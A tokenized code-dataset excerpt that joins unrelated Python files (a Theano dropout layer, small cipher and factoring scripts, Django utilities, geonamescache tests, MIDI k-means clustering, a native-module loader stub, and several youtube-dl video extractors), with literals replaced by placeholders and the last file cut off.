maximum ( cur , self . tmp_output ) <EOL> self . output = self . activation ( self . tmp_output ) <EOL> else : <EOL> self . output = ( lin_output if self . activation is None <EOL> else self . activation ( lin_output ) ) <EOL> self . params = [ self . W , self . b ] <EOL> self . delta_params = [ self . delta_W , self . delta_b ] <EOL> def _dropout_from_layer ( theano_rng , hid_out , p ) : <EOL> """<STR_LIT>""" <EOL> return theano_rng . binomial ( n = <NUM_LIT:1> , p = <NUM_LIT:1> - p , size = hid_out . shape , <EOL> dtype = theano . config . floatX ) * hid_out <EOL> class DropoutHiddenLayer ( HiddenLayer ) : <EOL> def __init__ ( self , rng , input , n_in , n_out , <EOL> W = None , b = None , activation = T . tanh , do_maxout = False , pool_size = <NUM_LIT:1> , dropout_factor = <NUM_LIT:0.5> ) : <EOL> super ( DropoutHiddenLayer , self ) . __init__ ( <EOL> rng = rng , input = input , n_in = n_in , n_out = n_out , W = W , b = b , <EOL> activation = activation , do_maxout = do_maxout , pool_size = pool_size ) <EOL> self . theano_rng = RandomStreams ( rng . randint ( <NUM_LIT:2> ** <NUM_LIT:30> ) ) <EOL> self . dropout_output = _dropout_from_layer ( theano_rng = self . theano_rng , <EOL> hid_out = self . output , p = dropout_factor ) </s>
<s> def alphabet_to_number ( word ) : <EOL> alphabet = '<STR_LIT>' <EOL> number = '<STR_LIT>' <EOL> array_alphabet = list ( alphabet ) <EOL> array_number = number . split ( '<STR_LIT:U+0020>' ) <EOL> converted_word = [ ] <EOL> for letter in word : <EOL> for n in range ( <NUM_LIT:0> , len ( array_number ) , <NUM_LIT:1> ) : <EOL> if letter == array_alphabet [ n ] : <EOL> converted_word . append ( array_number [ n ] ) <EOL> converted_word . append ( '<STR_LIT:U+0020>' ) <EOL> del converted_word [ - <NUM_LIT:1> ] <EOL> return '<STR_LIT>' . join ( converted_word ) <EOL> def number_to_alphabet ( numbers ) : <EOL> alphabet = '<STR_LIT>' <EOL> number = '<STR_LIT>' <EOL> array_number = number . split ( '<STR_LIT:U+0020>' ) <EOL> array_alphabet = list ( alphabet ) <EOL> numbers = numbers . split ( '<STR_LIT:U+0020>' ) <EOL> converted_numbers = [ ] <EOL> for num in numbers : <EOL> for n in range ( <NUM_LIT:0> , len ( array_alphabet ) , <NUM_LIT:1> ) : <EOL> if int ( num ) > <NUM_LIT> : <EOL> num = str ( int ( num ) - <NUM_LIT> ) <EOL> else : <EOL> if num == array_number [ n ] : <EOL> converted_numbers . append ( array_alphabet [ n ] ) <EOL> converted_numbers . append ( '<STR_LIT:U+0020>' ) <EOL> del converted_numbers [ - <NUM_LIT:1> ] <EOL> return '<STR_LIT>' . join ( converted_numbers ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> plaintext = '<STR_LIT>' <EOL> print ( alphabet_to_number ( plaintext ) ) <EOL> plaintext_number = '<STR_LIT>' <EOL> print ( number_to_alphabet ( plaintext_number ) ) </s>
<s> from lib3 import * <EOL> def trial_division ( N ) : <EOL> root = int ( ceil ( sqrt ( N ) ) ) <EOL> stop , p = False , root <EOL> while stop == False : <EOL> if N % p == <NUM_LIT:0> or p < <NUM_LIT:2> : <EOL> return p , int ( N / p ) <EOL> stop = True <EOL> p -= <NUM_LIT:1> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> N = <NUM_LIT> <EOL> trial_division ( N ) <EOL> print ( '<STR_LIT>' , trial_division ( N ) ) <EOL> '''<STR_LIT>''' </s>
<s> from functools import wraps <EOL> import os <EOL> from contextlib import contextmanager <EOL> import platform <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . utils . importlib import import_module <EOL> class DefaultedAttributes ( object ) : <EOL> def __init__ ( self , underlying , defaults ) : <EOL> self . underlying = underlying <EOL> self . defaults = defaults <EOL> def __getattr__ ( self , name ) : <EOL> if hasattr ( self . underlying , name ) : <EOL> return getattr ( self . underlying , name ) <EOL> try : <EOL> return self . defaults [ name ] <EOL> except KeyError , error : <EOL> raise AttributeError ( "<STR_LIT>" % ( self . underlying . __class__ . __name__ , name ) ) <EOL> def get_callable ( callable ) : <EOL> if isinstance ( callable , basestring ) : <EOL> module , attr = callable . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> try : <EOL> mod = import_module ( module ) <EOL> except ImportError , e : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % ( callable , e ) ) <EOL> try : <EOL> callable = getattr ( mod , attr ) <EOL> except AttributeError , e : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % ( callable , e ) ) <EOL> return callable <EOL> def only_on ( system ) : <EOL> def decor ( func ) : <EOL> @ wraps ( func ) <EOL> def callable ( * args , ** kwargs ) : <EOL> if platform . system ( ) != system : <EOL> return <EOL> return func ( * args , ** kwargs ) <EOL> return callable <EOL> return decor <EOL> @ contextmanager <EOL> def altered_umask ( umask ) : <EOL> old_umask = os . umask ( umask ) <EOL> try : <EOL> yield <EOL> finally : <EOL> os . umask ( old_umask ) </s>
<s> import unittest <EOL> from geonamescache import GeonamesCache <EOL> class GeonamesCacheTestSuite ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . geonamescache = GeonamesCache ( ) <EOL> def test_continents ( self ) : <EOL> continents = self . geonamescache . get_continents ( ) <EOL> testdata = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> for code , name in testdata : <EOL> self . assertTrue ( code in continents ) <EOL> self . assertEqual ( name , continents [ code ] [ '<STR_LIT:name>' ] ) <EOL> for code in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertTrue ( code not in continents ) <EOL> def test_get_countries ( self ) : <EOL> countries = self . geonamescache . get_countries ( ) <EOL> testdata = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for code , name in testdata : <EOL> self . assertTrue ( code in countries ) <EOL> self . assertEqual ( name , countries [ code ] [ '<STR_LIT:name>' ] ) <EOL> for code in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertTrue ( code not in countries ) <EOL> def test_us_states ( self ) : <EOL> us_states = self . geonamescache . get_us_states ( ) <EOL> testdata = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for code , name in testdata : <EOL> self . assertTrue ( code in us_states ) <EOL> self . assertEqual ( name , us_states [ code ] [ '<STR_LIT:name>' ] ) <EOL> for code in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertTrue ( code not in us_states ) <EOL> def test_get_countries_by_names ( self ) : <EOL> self . assertTrue ( len ( self . geonamescache . get_countries_by_names ( ) ) , <EOL> len ( self . geonamescache . 
get_countries ( ) ) ) <EOL> def test_get_cities_by_name ( self ) : <EOL> cities = self . geonamescache . get_cities ( ) <EOL> for gid , name in ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> self . assertEqual ( name , cities [ gid ] [ '<STR_LIT:name>' ] ) <EOL> def test_get_cities_by_name_madrid ( self ) : <EOL> self . assertEqual ( <EOL> <NUM_LIT:2> , len ( self . geonamescache . get_cities_by_name ( '<STR_LIT>' ) ) ) <EOL> def test_us_counties_len ( self ) : <EOL> us_counties = self . geonamescache . get_us_counties ( ) <EOL> self . assertEqual ( <NUM_LIT> , len ( us_counties ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import util <EOL> import numpy as np <EOL> import random <EOL> import sys <EOL> def getBestBarList ( midiFileName , beatsPerBar = <NUM_LIT:4> ) : <EOL> barLists = util . getNGramBarList ( midiFileName , n = beatsPerBar ) <EOL> return barLists [ <NUM_LIT:0> ] <EOL> def euclideanDistance ( mat_a , index_mat , index ) : <EOL> diff_mat = np . subtract ( mat_a , np . tile ( index_mat [ index ] , ( mat_a . shape [ <NUM_LIT:0> ] , <NUM_LIT:1> ) ) ) <EOL> dists = [ np . linalg . norm ( vec ) for vec in diff_mat ] <EOL> return dists <EOL> def cosineDistance ( mat_a , index_mat , index ) : <EOL> dot_mat = np . dot ( mat_a , index_mat [ index ] . reshape ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) . transpose ( ) <EOL> dists = [ dot_mat [ <NUM_LIT:0> , i ] / ( np . linalg . norm ( mat_a [ i ] ) * np . linalg . norm ( index_mat [ index ] ) ) for i in range ( dot_mat . shape [ <NUM_LIT:1> ] ) ] <EOL> return dists <EOL> def getClosestCentroid ( centroids_mat , data_mat , index ) : <EOL> dists = euclideanDistance ( centroids_mat , data_mat , index ) <EOL> return np . argmin ( dists ) <EOL> def getClosestCentroidFromVector ( centroids_mat , vector ) : <EOL> return getClosestCentroid ( centroids_mat , [ vector ] , <NUM_LIT:0> ) <EOL> def getFeatureCentroids ( midiFiles , beatsPerBar = <NUM_LIT:4> , numCentroids = <NUM_LIT:12> , maxIterations = <NUM_LIT:100> ) : <EOL> bestBarList = [ ] <EOL> for midiFileName in midiFiles : <EOL> bestBarList += getBestBarList ( midiFileName , beatsPerBar = beatsPerBar ) <EOL> numExamples = len ( bestBarList ) <EOL> data_mat = np . array ( [ bar . getKMeansFeatures ( ) for bar in bestBarList ] ) <EOL> print '<STR_LIT>' <EOL> indices = range ( numExamples ) <EOL> random . 
shuffle ( indices ) <EOL> centroids_mat = data_mat [ indices [ : numCentroids ] ] <EOL> iterations = <NUM_LIT:0> <EOL> corr_centers = [ - <NUM_LIT:1> ] * numExamples <EOL> n_dashes = <NUM_LIT:0> <EOL> print "<STR_LIT>" , <EOL> for _ in range ( maxIterations ) : <EOL> if _ * <NUM_LIT> / maxIterations > n_dashes : <EOL> for i in range ( ( ( _ * <NUM_LIT> ) / maxIterations ) - n_dashes ) : <EOL> sys . stdout . write ( '<STR_LIT:->' ) <EOL> sys . stdout . flush ( ) <EOL> n_dashes += <NUM_LIT:1> <EOL> iterations += <NUM_LIT:1> <EOL> corr_points = [ [ ] for placeholder in range ( numCentroids ) ] <EOL> new_corr_centers = [ ] <EOL> for index in range ( numExamples ) : <EOL> center = getClosestCentroid ( centroids_mat , data_mat , index ) <EOL> new_corr_centers . append ( center ) <EOL> corr_points [ center ] . append ( index ) <EOL> for index in range ( numCentroids ) : <EOL> rel_points = data_mat [ corr_points [ index ] ] . transpose ( ) <EOL> centroids_mat [ index ] = np . array ( [ np . mean ( pt_points ) if pt_points . any ( ) else <NUM_LIT:0> for pt_points in rel_points ] ) <EOL> if new_corr_centers == corr_centers : <EOL> break <EOL> corr_centers = list ( new_corr_centers ) <EOL> print "<STR_LIT>" <EOL> return ( centroids_mat , corr_centers ) <EOL> def evaluateKmeansClusters ( midiFiles , centroids , corr_centers ) : <EOL> bestBarList = [ ] <EOL> for midiFileName in midiFiles : <EOL> bestBarList += getBestBarList ( midiFileName ) <EOL> numExamples = len ( bestBarList ) <EOL> numCentroids = centroids . shape [ <NUM_LIT:0> ] <EOL> data_mat = np . array ( [ bar . getKMeansFeatures ( ) for bar in bestBarList ] ) <EOL> def silhouette ( index ) : <EOL> same_cntr_pts = data_mat [ [ i for i , x in enumerate ( corr_centers ) if x == corr_centers [ index ] ] ] <EOL> a_i = np . mean ( euclideanDistance ( same_cntr_pts , data_mat , index ) ) <EOL> diff_centroids = centroids [ [ i for i in range ( numCentroids ) if i != corr_centers [ index ] ] ] <EOL> b_i = np . 
min ( euclideanDistance ( diff_centroids , data_mat , index ) ) <EOL> return ( b_i - a_i ) / max ( a_i , b_i ) <EOL> return np . mean ( [ silhouette ( i ) for i in range ( numExamples ) ] ) </s>
<s> def __load ( ) : <EOL> import imp , os , sys <EOL> try : <EOL> dirname = os . path . dirname ( __loader__ . archive ) <EOL> except NameError : <EOL> dirname = sys . prefix <EOL> path = os . path . join ( dirname , '<STR_LIT>' ) <EOL> mod = imp . load_dynamic ( __name__ , path ) <EOL> __load ( ) <EOL> del __load </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> import json <EOL> from . common import InfoExtractor <EOL> from . . utils import ( <EOL> int_or_none , <EOL> parse_age_limit , <EOL> ) <EOL> class BreakIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TESTS = [ { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } <EOL> } , { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } ] <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> webpage = self . _download_webpage ( <EOL> '<STR_LIT>' % video_id , video_id ) <EOL> info = json . loads ( self . _search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT>' , flags = re . DOTALL ) ) <EOL> youtube_id = info . get ( '<STR_LIT>' ) <EOL> if youtube_id : <EOL> return self . url_result ( youtube_id , '<STR_LIT>' ) <EOL> formats = [ { <EOL> '<STR_LIT:url>' : media [ '<STR_LIT>' ] + '<STR_LIT:?>' + info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : media [ '<STR_LIT>' ] , <EOL> '<STR_LIT:width>' : media [ '<STR_LIT:width>' ] , <EOL> '<STR_LIT>' : media [ '<STR_LIT>' ] , <EOL> } for media in info [ '<STR_LIT>' ] ] <EOL> if not formats : <EOL> formats . append ( { <EOL> '<STR_LIT:url>' : info [ '<STR_LIT>' ] <EOL> } ) <EOL> self . _sort_formats ( formats ) <EOL> duration = int_or_none ( info . get ( '<STR_LIT>' ) ) <EOL> age_limit = parse_age_limit ( info . get ( '<STR_LIT>' ) ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : duration , <EOL> '<STR_LIT>' : age_limit , <EOL> '<STR_LIT>' : formats , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> from . common import InfoExtractor <EOL> from . . utils import ExtractorError <EOL> class FreeVideoIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> webpage , handle = self . _download_webpage_handle ( url , video_id ) <EOL> if '<STR_LIT>' in handle . geturl ( ) : <EOL> raise ExtractorError ( <EOL> '<STR_LIT>' , <EOL> expected = True ) <EOL> video_url = self . _search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT>' ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:url>' : video_url , <EOL> '<STR_LIT:title>' : video_id , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . utils import ( <EOL> int_or_none , <EOL> parse_duration , <EOL> ) <EOL> class HornBunnyIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> video_id = mobj . group ( '<STR_LIT:id>' ) <EOL> webpage = self . _download_webpage ( <EOL> url , video_id , note = '<STR_LIT>' ) <EOL> title = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT:title>' ) <EOL> redirect_url = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT:title>' ) <EOL> webpage2 = self . _download_webpage ( redirect_url , video_id ) <EOL> video_url = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage2 , '<STR_LIT>' ) <EOL> duration = parse_duration ( self . _search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT>' , fatal = False ) ) <EOL> view_count = int_or_none ( self . _search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT>' , fatal = False ) ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:url>' : video_url , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : duration , <EOL> '<STR_LIT>' : view_count , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import os . path <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . compat import ( <EOL> compat_urllib_parse , <EOL> compat_urllib_request , <EOL> ) <EOL> class MonikerIE ( InfoExtractor ) : <EOL> IE_DESC = '<STR_LIT>' <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TESTS = [ { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } , <EOL> } , { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } , <EOL> } , { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } ] <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> orig_webpage = self . _download_webpage ( url , video_id ) <EOL> fields = re . findall ( r'<STR_LIT>' , orig_webpage ) <EOL> data = dict ( fields ) <EOL> post = compat_urllib_parse . urlencode ( data ) <EOL> headers = { <EOL> b'<STR_LIT:Content-Type>' : b'<STR_LIT>' , <EOL> } <EOL> req = compat_urllib_request . Request ( url , post , headers ) <EOL> webpage = self . _download_webpage ( <EOL> req , video_id , note = '<STR_LIT>' ) <EOL> title = os . path . splitext ( data [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> links = re . findall ( r'<STR_LIT>' , webpage ) <EOL> formats = [ { <EOL> '<STR_LIT:url>' : l , <EOL> '<STR_LIT>' : i , <EOL> } for i , l in enumerate ( links ) ] <EOL> self . _sort_formats ( formats ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : formats , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . compat import ( <EOL> compat_urllib_parse_urlparse , <EOL> ) <EOL> from . . utils import ( <EOL> ExtractorError , <EOL> int_or_none , <EOL> remove_end , <EOL> ) <EOL> class NFLIE ( InfoExtractor ) : <EOL> IE_NAME = '<STR_LIT>' <EOL> _VALID_URL = r'''<STR_LIT>''' <EOL> _TESTS = [ <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> ] <EOL> @ staticmethod <EOL> def prepend_host ( host , url ) : <EOL> if not url . startswith ( '<STR_LIT:http>' ) : <EOL> if not url . startswith ( '<STR_LIT:/>' ) : <EOL> url = '<STR_LIT>' % url <EOL> url = '<STR_LIT>' . format ( host , url ) <EOL> return url <EOL> @ staticmethod <EOL> def format_from_stream ( stream , protocol , host , path_prefix = '<STR_LIT>' , <EOL> preference = <NUM_LIT:0> , note = None ) : <EOL> url = '<STR_LIT>' . format ( <EOL> protocol = protocol , <EOL> host = host , <EOL> prefix = path_prefix , <EOL> path = stream . get ( '<STR_LIT:path>' ) , <EOL> ) <EOL> return { <EOL> '<STR_LIT:url>' : url , <EOL> '<STR_LIT>' : int_or_none ( stream . 
get ( '<STR_LIT>' , <NUM_LIT:0> ) , <NUM_LIT:1000> ) , <EOL> '<STR_LIT>' : preference , <EOL> '<STR_LIT>' : note , <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> video_id , host = mobj . group ( '<STR_LIT:id>' ) , mobj . group ( '<STR_LIT:host>' ) <EOL> webpage = self . _download_webpage ( url , video_id ) <EOL> config_url = NFLIE . prepend_host ( host , self . _search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT>' ) ) <EOL> config = self . _download_json ( config_url , video_id , <EOL> note = '<STR_LIT>' ) <EOL> url_template = NFLIE . prepend_host ( <EOL> host , '<STR_LIT>' . format ( ** config ) ) <EOL> video_data = self . _download_json ( <EOL> url_template . format ( id = video_id ) , video_id ) <EOL> formats = [ ] <EOL> cdn_data = video_data . get ( '<STR_LIT>' , { } ) <EOL> streams = cdn_data . get ( '<STR_LIT>' , [ ] ) <EOL> if cdn_data . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> parts = compat_urllib_parse_urlparse ( cdn_data . get ( '<STR_LIT>' ) ) <EOL> protocol , host = parts . scheme , parts . netloc <EOL> for stream in streams : <EOL> formats . append ( <EOL> NFLIE . format_from_stream ( stream , protocol , host ) ) <EOL> else : <EOL> cdns = config . get ( '<STR_LIT>' ) <EOL> if not cdns : <EOL> raise ExtractorError ( '<STR_LIT>' , expected = True ) <EOL> for name , cdn in cdns . items ( ) : <EOL> if cdn . get ( '<STR_LIT:name>' ) == '<STR_LIT>' : <EOL> continue <EOL> protocol = cdn . get ( '<STR_LIT>' ) <EOL> host = remove_end ( cdn . get ( '<STR_LIT:host>' , '<STR_LIT>' ) , '<STR_LIT:/>' ) <EOL> if not ( protocol and host ) : <EOL> continue <EOL> prefix = cdn . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if prefix and not prefix . endswith ( '<STR_LIT:/>' ) : <EOL> prefix = '<STR_LIT>' % prefix <EOL> preference = <NUM_LIT:0> <EOL> if protocol == '<STR_LIT>' : <EOL> preference = - <NUM_LIT:2> <EOL> elif '<STR_LIT>' in name . 
lower ( ) : <EOL> preference = <NUM_LIT:1> <EOL> for stream in streams : <EOL> formats . append ( <EOL> NFLIE . format_from_stream ( stream , protocol , host , <EOL> prefix , preference , name ) ) <EOL> self . _sort_formats ( formats ) <EOL> thumbnail = None <EOL> for q in ( '<STR_LIT>' , '<STR_LIT:l>' , '<STR_LIT:m>' , '<STR_LIT:s>' , '<STR_LIT>' ) : <EOL> thumbnail = video_data . get ( '<STR_LIT>' , { } ) . get ( q ) <EOL> if thumbnail : <EOL> break <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : video_data . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : formats , <EOL> '<STR_LIT:description>' : video_data . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : video_data . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : thumbnail , <EOL> '<STR_LIT>' : int_or_none ( video_data . get ( '<STR_LIT>' ) , <NUM_LIT:1000> ) , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import json <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . utils import int_or_none <EOL> class PodomaticIE ( InfoExtractor ) : <EOL> IE_NAME = '<STR_LIT>' <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TESTS = [ <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> } , <EOL> ] <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> video_id = mobj . group ( '<STR_LIT:id>' ) <EOL> channel = mobj . group ( '<STR_LIT>' ) <EOL> json_url = ( ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) % <EOL> ( mobj . group ( '<STR_LIT>' ) , channel , video_id ) ) <EOL> data_json = self . _download_webpage ( <EOL> json_url , video_id , '<STR_LIT>' ) <EOL> data = json . loads ( data_json ) <EOL> video_url = data [ '<STR_LIT>' ] <EOL> if not video_url : <EOL> video_url = '<STR_LIT>' % ( data [ '<STR_LIT>' ] . replace ( '<STR_LIT>' , '<STR_LIT:http>' ) , data [ '<STR_LIT>' ] ) <EOL> uploader = data [ '<STR_LIT>' ] <EOL> title = data [ '<STR_LIT:title>' ] <EOL> thumbnail = data [ '<STR_LIT>' ] <EOL> duration = int_or_none ( data . 
get ( '<STR_LIT>' ) , <NUM_LIT:1000> ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:url>' : video_url , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : uploader , <EOL> '<STR_LIT>' : channel , <EOL> '<STR_LIT>' : thumbnail , <EOL> '<STR_LIT>' : duration , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> from . common import InfoExtractor <EOL> class TenPlayIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> } <EOL> _video_fields = [ <EOL> "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def _real_extract ( self , url ) : <EOL> webpage = self . _download_webpage ( url , url ) <EOL> video_id = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT>' ) <EOL> api_token = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT>' ) <EOL> title = self . _html_search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT:title>' ) <EOL> json = self . _download_json ( '<STR_LIT>' % ( video_id , api_token , '<STR_LIT:U+002C>' 